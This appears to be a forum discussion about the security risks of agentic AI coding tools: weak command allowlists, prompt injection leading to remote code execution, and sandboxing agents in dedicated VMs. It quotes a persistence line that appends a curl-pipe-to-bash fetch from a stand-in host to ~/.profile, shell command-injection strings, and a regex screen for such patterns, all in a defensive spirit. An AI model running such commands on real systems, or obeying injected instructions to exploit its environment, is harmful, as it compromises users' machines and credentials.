Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.
Or am I missing something?
Typically, running something like git would be an opt-in permission.
Only if the rollback is done at the VM/container level; otherwise the agent can end up running arbitrary code that modifies files or configuration unbeknownst to the AI coding tool. For instance, running
bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"
Doesn't this give the LLM the ability to execute arbitrary scripts?
cmd.split(" ") in ["cd", "ls", ...]
is an easy target for command injection. Just to name a few:
ls . && evil.sh
ls $(evil.sh)
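A quick sketch of why that kind of check fails (the allowlist and helper names are illustrative, not any particular tool's code), plus the usual safer shape: tokenize, validate the whole argv, and never hand the raw string to a shell:

    import shlex
    import subprocess

    ALLOWED = {"cd", "ls", "cat"}  # stand-in allowlist (illustrative)

    def naive_check(cmd: str) -> bool:
        # What the snippet above amounts to: look at the first word only.
        return cmd.split(" ")[0] in ALLOWED

    for cmd in ["ls .", "ls . && evil.sh", "ls $(evil.sh)"]:
        print(cmd, "->", naive_check(cmd))  # all three pass the first-word check

    # Safer shape: tokenize, validate the whole argv, and run without a shell,
    # so "&&" and "$(...)" stay literal arguments instead of shell syntax.
    def run_checked(cmd: str):
        argv = shlex.split(cmd)
        if not argv or argv[0] not in ALLOWED:
            raise PermissionError(f"command not allowed: {cmd!r}")
        return subprocess.run(argv, shell=False, capture_output=True, text=True)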
2. Even if the AI agent itself is sandboxed, if it can make changes to code and you don't inspect all of its output, it can easily place malicious code that gets executed once you try to run it. The only safe way of doing this is a dedicated AI development VM where you do all the prompting and testing, where only very limited credentials are present (in case it gets compromised), and where changes only leave the VM after a thorough inspection (e.g. a PR process).
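For that "inspection before anything leaves the VM" step, even a dumb automated screen can flag the most blatant stuff ahead of human review. A rough sketch (the patterns and the origin/main base are assumptions, and this is no substitute for actually reading the diff):

    import re
    import subprocess

    SUSPICIOUS = [
        r"curl[^\n]*\|\s*(ba)?sh",        # piping a download straight into a shell
        r"base64\s+(-d|--decode)",        # decoding an embedded payload
        r">>\s*~?/?\.?(profile|bashrc)",  # shell-startup persistence
        r"\beval\s*\(",                   # dynamic code execution
    ]

    def screen_diff(base: str = "origin/main") -> list[str]:
        """Return added lines in the diff against `base` that match a suspicious pattern."""
        diff = subprocess.run(["git", "diff", base],
                              capture_output=True, text=True).stdout
        return [line for line in diff.splitlines()
                if line.startswith("+") and any(re.search(p, line) for p in SUSPICIOUS)]

    if __name__ == "__main__":
        for hit in screen_diff():
            print("review carefully:", hit)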
Previously you might've been able to say "okay, but that requires the attacker to guess the specifics of my environment" - which is no longer true. An attacker can now simply instruct the LLM to exploit your environment and hope the LLM figures out how to do it on its own.
Amazon Q Developer: Remote Code Execution with Prompt Injection
https://embracethered.com/blog/posts/2025/amazon-q-developer...
My point was just that stated rules and restrictions that the model is supposed to abide by can't be trusted. You need to assume it will occasionally do batshit stuff and make sure you are restricting its access accordingly.
Like say you asked it to fix your RLS permissions for a specific table. That needs to go into a migration and you need to vet it. :)
I guarantee that some people are trying "vibe sysadmining" or "vibe devopsing", and there are going to be some nasty surprises. Granted, it's usually well behaved, but it's not at all rare for it to start making bad assumptions and taking shortcuts when it can.